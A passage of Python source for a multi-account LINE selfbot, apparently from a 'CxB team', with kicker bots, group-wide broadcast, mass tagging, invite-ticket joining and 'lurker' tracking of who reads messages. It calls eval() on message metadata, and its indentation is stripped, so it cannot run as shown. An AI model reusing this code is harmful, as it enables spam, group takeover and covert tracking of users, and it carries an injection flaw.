cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "™[ Protect Settings ]™\n\n"
if wait["sticker"] == True: md+="™ Sticker「on」\n"
else: md+="™ Sticker「off」\n"
if wait["contact"] == True: md+="™↔ Contact「on」\n"
else: md+="™↔ Contact「off」\n"
if wait["talkban"] == True: md+="™↔ Talkban「on」\n"
else: md+="™↔ Talkban「off」\n"
if wait["Mentionkick"] == True: md+="™↔ Notag「on」\n"
else: md+="™↔ Notag「off」\n"
if wait["detectMention"] == True: md+="™↔ Respon「on」"
else: md+="™↔ Respon「off」\n"
if wait["autoJoin"] == True: md+="™↔ Autojoin「on」\n"
else: md+="™↔ Autojoin「off」\n"
if wait["autoAdd"] == True: md+="™↔ Autoadd「on」\n"
else: md+="™↔ Autoadd「off」\n"
if msg.to in welcome: md+="™↔ Welcome「on」\n"
else: md+="™↔ Welcome「off」\n"
if wait["autoLeave"] == True: md+="™↔ Autoleave「on」\n"
else: md+="™↔ Autoleave「off」\n"
if msg.to in protectqr: md+="™↔ Protecturl「on」\n"
else: md+="™↔ Protecturl「off」\n"
if msg.to in protectjoin: md+="™↔ Protectjoin「on」\n"
else: md+="™↔ Protectjoin「off」\n"
if msg.to in protectkick: md+="™↔ Protectkick「on」\n"
else: md+="™↔ Protectkick「off」\n"
if msg.to in protectcancel: md+="™↔ Protectcancel「on」\n"
else: md+="™↔ Protectcancel「off」\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator CxB team")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "™↔ Nama : "+str(mi.displayName)+"\n™↔ Mid : " +key1+"\n™↔ Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「Setkey」\nSetkey diganti 「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Sabar bos..")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Sudah bos...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "™↔CxB Group Info\n\n™↔ Nama Group : {}".format(G.name)+ "\n™↔ ID Group : {}".format(G.id)+ "\n™↔ Pembuat : {}".format(G.creator.displayName)+ "\n™↔ Waktu Dibuat : {}".format(str(timeCreated))+ "\n™↔ Jumlah Member : {}".format(str(len(G.members)))+ "\n™↔ Jumlah Pending : {}".format(gPending)+ "\n™↔ Group Qr : {}".format(gQr)+ "\n™↔ Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "™↔ CxB team Grup Info\n"
ret_ += "\n™↔ Nama Group : {}".format(G.name)
ret_ += "\n™↔ ID Group : {}".format(G.id)
ret_ += "\n™↔ Pembuat : {}".format(gCreator)
ret_ += "\n™↔ Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n™↔ Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n™↔ Jumlah Pending : {}".format(gPending)
ret_ += "\n™↔ Group Qr : {}".format(gQr)
ret_ += "\n™↔ Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "™↔ "+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"™↔ Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
for i in group:
ginfo = cl.getGroup(i)
if ginfo == group:
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
kd.leaveGroup(i)
ke.leaveGroup(i)
kf.leaveGroup(i)
kg.leaveGroup(i)
kh.leaveGroup(i)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"╔══[ FRIEND LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["RAfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["RAfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["RAfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["RAfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["RAfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == '😆':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 100:
mentionMembers(msg.to, nama)
if jml > 100 and jml < 200:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, 399):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (400, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB bots\n\n"+ma+"\nTotal「%s」CxB bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB admin\n\nOwner:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」CxB team" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"™↔ CxB team Protection\n\n™↔ Protect Url :\n"+ma+"\n™↔ Protect Kick:\n"+mb+"\n™↔ protect Join:\n"+md+"\n™↔ Protect Cancel:\n"+mc+"\nTotal「%s」Grup protect" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
kk.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
ki.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "kicker join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "™↔ CxB Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "Progres speed...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['RAreadPoint'][msg.to] = msg_id
Setmain['RAreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['RAreadPoint'][msg.to]
del Setmain['RAreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['RAreadPoint']:
if Setmain['RAreadMember'][msg.to] != {}:
aa = []
for x in Setmain['RAreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['RAreadPoint'][msg.to]
del Setmain['RAreadMember'][msg.to]
except:
pass
Setmain['RAreadPoint'][msg.to] = msg.id
Setmain['RAreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「Jadwal Sholat」"
ret_ += "\n™↔ Lokasi : " + data[0]
ret_ += "\n™↔ " + data[1]
ret_ += "\n™↔ " + data[2]
ret_ += "\n™↔ " + data[3]
ret_ += "\n™↔ " + data[4]
ret_ += "\n™↔ " + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「Status Cuaca」"
ret_ += "\n™↔ Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n™↔ Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n™↔ Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n™↔ Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n™↔ Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「Info Lokasi」"
ret_ += "\n™↔ Location : " + data[0]
ret_ += "\n™↔ Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "╔══[ Lyric ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
cl.sendText(msg.to, str(ret_))
except:
cl.sendText(to, "Lirik tidak ditemukan")
elif cmd.startswith("music: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
